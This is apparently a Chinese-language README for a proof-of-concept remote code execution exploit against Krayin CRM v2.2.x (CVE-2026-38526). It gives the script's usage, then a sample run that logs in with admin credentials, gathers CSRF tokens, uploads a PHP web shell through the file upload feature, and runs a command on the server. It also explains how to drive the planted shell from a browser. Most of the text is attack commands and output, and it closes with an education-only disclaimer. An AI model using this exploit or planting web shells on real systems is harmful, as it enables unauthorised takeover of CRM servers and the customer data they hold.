由 infrar3d 编写
这是一个专为 Krayin CRM v2.2.x(一款开源客户关系管理系统)设计的远程代码执行(RCE)概念验证(PoC)脚本。该脚本可自动化利用 CRM 管理界面中的文件上传漏洞,在目标服务器上实现远程命令执行。
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND
Krayin CRM RCE Exploit
options:
-h, --help show this help message and exit
-rh, --rhost RHOST Remote host
-u, --username USERNAME
Username or E-mail
-p, --password PASSWORD
Password
-c, --command COMMAND
Command to execute
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'
[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
默认情况下,该脚本会从 revshells.com 上传一个 PHP cmd 类型的 shell。
利用完成后,你可以在浏览器中打开该 shell,并通过网页发送命令。
本软件及概念验证代码仅用于教育和研究目的。
你有责任遵守所有适用法律。请合乎道德地、负责任地使用本工具。